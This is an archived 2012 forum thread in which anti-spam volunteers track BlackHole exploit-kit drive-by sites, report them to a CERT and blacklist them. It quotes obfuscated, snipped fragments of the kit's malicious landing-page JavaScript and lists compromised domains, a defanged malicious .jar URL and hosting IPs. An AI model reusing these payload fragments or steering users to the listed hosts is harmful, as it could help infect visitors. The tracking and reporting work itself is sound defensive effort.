Last visit was: Fri Jul 04, 2014 8:20 pm
It is currently Fri Jul 04, 2014 8:20 pm

Numerous malware drive by attempts


All times are UTC - 5 hours [ DST ]


 [ 38 posts ]  Go to page Previous  1, 2, 3
Author Message
 PostPosted: Mon Jun 18, 2012 9:05 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
More of the same [80]
Code:
ftp.psimpresores.com.ar
a1caravanning.co.uk
amf.dreamhosters.com
camper.waw.pl
cd8.com.cn
cphinney.liquidarchaeology.com
en.highsure.com.cn
en.pymed.com.cn
forum.patriaefidelis.pl
gliiaci.altervista.org
itlb.com.cn
lauriethelibrarian.electrified.ca
library.fandomcafe.com
pics.pixelarium.ch
protonx.pr.funpic.de
sacidaker.com.tr
schalkewiki.sc.funpic.de
serwis.vline.pl
sprockanastacia.altervista.org
test.vesterberg.org
tmvision.com.ar
us.com.sa
web3b.sakura.ne.jp
www.abepsi.org.br
www.albanoguattiphotography.com
www.androsoftitalia.altervista.org
www.beckerundkries.de
www.bhc.co.rs
www.biathlonnachwuchs.de
www.bleugarance.fr
www.bluesclub.pl
www.bunnyschool.co.rs
www.cidademanaus.com.br
www.constructoradelbosque.com
www.cqnasx.com
www.davidcantero.fr
www.deq.state.ms.us
www.donnepercambiare.altervista.org
www.engineerable.com
www.everline.ru
www.goodway.sh.cn
www.goushoubiao.com
www.gztwzl.com
www.helpincleaning.co.uk
www.hostelnewmorning.com
www.houseoflordsla.com
www.huguet.cl
www.infrontofmycamera.com
www.jysj.net.cn
www.lipe.rs
www.lizzieannbags.co.uk
www.lyhyjt.cn
www.nordcapitalgroup.ru
www.paree.cn
www.planetearthstaffing.com
www.plusbeograd.com
www.puteviinvest.rs
www.qchzd.com
www.shdexi.com
www.shidokai.co.uk
www.sit.gov.cv
www.skagen.bz
www.stlukesforesthills.org
www.storgas.co.rs
www.sztrm.co.rs
www.therapy2000.com
www.therealmantracker.com
www.timobieber.de
www.ubefekt.pl
www.voodoolab.org
www.walkislesofscilly.co.uk
www.wdjly.com
www.webclinic.ro
www.webuymaternity.com
www.wizantiana.co.rs
www.writersinc.co
www.xialy.com
www.xiaofeima.com
www.yemio.co.uk
www.zjsfz.com
www.zkkrosno.vel.pl


Malicious Redirections de-obfuscated: monashkanasene.ru
Code:
    hxxp://monashkanasene.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
    hxxp://monashkanasene.ru:8080/forum/Half.jar


Analysis of threats:
Wepawet analysis

Hosting IPs
monashkanasene.ru has address 213.17.171.186
monashkanasene.ru has address 89.111.177.151
monashkanasene.ru has address 94.20.30.91
monashkanasene.ru has address 173.224.209.130
monashkanasene.ru has address 124.124.212.172

Name server hosting IPs
ns1.monashkanasene.ru. 62.76.188.120
ns2.monashkanasene.ru. 62.213.64.161
ns3.monashkanasene.ru. 41.66.137.155
ns4.monashkanasene.ru. 184.106.189.124
ns5.monashkanasene.ru. 50.57.43.49
ns6.monashkanasene.ru. 173.203.96.79

Status
REGISTERED, DELEGATED, UNVERIFIED


Top
 Profile WWW  
 PostPosted: Mon Jun 18, 2012 11:29 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
I wrote:


CERT-GIB wrote:
CERT-GIB Incident Response Team response@cert-gib.ru

12:26 AM (14 hours ago)

to me
Good day.

We have notified the registrar and waiting for response.

--
Best regards,
Gonebnyy Albert
CERT-GIB
+7 (495) 988-00-40
[email protected]
http://www.cert-gib.ru/

--

SUMATRANAJUGE.RU
REGISTERED, NOT DELEGATED, UNVERIFIED


Top
 Profile WWW  
 PostPosted: Fri Sep 14, 2012 10:37 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
Red Dwarf wrote:
Live site payload:
Code:
<h1><b>Please Wait... Loading...</h1></b>

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,
[~ snip ~]


The exploit(s) which I've been following has adopted a new edition of the BlackHole exploit kit, according to Steven Burn (his remark on a WOT forum). The encrypted data that JavaScript uses to render a "payload" site's webpage on the fly has been moved from the script's text into a PRE tag, but the result is familiar

Code:
try{var PluginDetect={version:"0.7.8",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;ag(b[a],10)){return 1}if(g(c[a],10)c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{g=a.slice(2);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return "+e+"*@[email protected]*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f0&&c.isFunc(b[0])))){a.push(b)}},
[~ snip ~]

The payload sites that I've noticed over the past several months use IP addresses in lieu of domain names and are mostly hosted in the USA. Several new payload sites are sometimes introduced within the same day. The sites' webserver claims to be "nginx/0.7.67" and will reply with bogus HTTP errors to requests from many IP addresses known to be used by virus-hunters, probably including Wepawet and urlQuery. In addition to the rather dated collection of malware, the kit recently added a new exploit for a Java vulnerability (CVE-2012-4681) which may not yet be patched on many computers.


Top
 Profile  
 PostPosted: Mon Sep 17, 2012 9:46 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.

Per day, at least 800 - 900 new domains are taken over to present these malware sites. That's a direct stat from both law enforcement and the ongoing monitoring by several trackers of Zeus-related spam.

I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.

I think the past three years has seen a huge increase in the abuse of old abandoned web servers, very often hosted by companies who are completely unresponsive to any abuse requests. And it's not just for malware like this. It's anything. Pharmacy spam, porn, you name it.

SiL


Top
 Profile  
 PostPosted: Tue Sep 18, 2012 7:20 am   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
spamislame wrote:
but it's like grabbing a cup of water from the ocean.
Although I should guess that the scale is much closer to grabbing a cup of water from a mellow pond, I appreciate the saliency of your point. :)


Top
 Profile  
 PostPosted: Tue Sep 18, 2012 4:44 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
spamislame wrote:
You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.
..
I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.



For the few that are not abandoned, getting the domain black/red-listed in WOT and Site Advisor sure gains their attention and they patch up the security hole, or at least remove the harmful web pages..
For the remaining 99.99% getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.


Top
 Profile WWW  
 PostPosted: Wed Sep 19, 2012 6:15 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
Red Dwarf wrote:
For the remaining 99.99% getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.

In addition to planting keyloggers and such, I suspect the particular BlackHole exploit which my WOT thread has been following attempts to secretly recruit its victims' computers into a botnet. (The same "kit" is also used by other groups not followed in my thread.) I have read somewhere that the mischief is mostly accomplished within the first few hours after launching the scam webpages. I have also read that the biggest spammers use a botnet of ten thousand or even twenty thousand zombie computers. My intention has been to raise the alarm on WOT a few hours earlier than WOT's automation would add warnings from its trusted sources. (My cup runneth over.)

Until recently, the exploit used old malware, which is widely detected by most antivirus services, to exploit old vulnerabilities for which patches have been available for a year or two. Only the most neglectful, inept and bewildered (NIB) computer users should have risked infection under these circumstances, perhaps people who are the least likely to install WOT. Now, however, a new Java exploit (as previously noted) has been added and the BlackHole exploit kit has been revised to be more elusive in some ways. The pressure to revise may have come from a diminishing number of still uninfected computers operated by those NIB-lets. I've planned to curtail much of my effort at my thread's six months point in a few days. I think that the thread archives enough malicious URLs to illustrate how treacherous that exploit kit has become.


Top
 Profile  
 PostPosted: Thu Sep 20, 2012 3:34 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
Sorry, I have been neglecting those, and WOT in general - too busy doing scam busting.

I posted a fresh 50 from the past week at
http://www.mywot.com/en/forum/21464-qai ... ent-163762

They were all in the form /********/index.html


Top
 Profile WWW  
 [ 38 posts ]  Go to page Previous  1, 2, 3

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008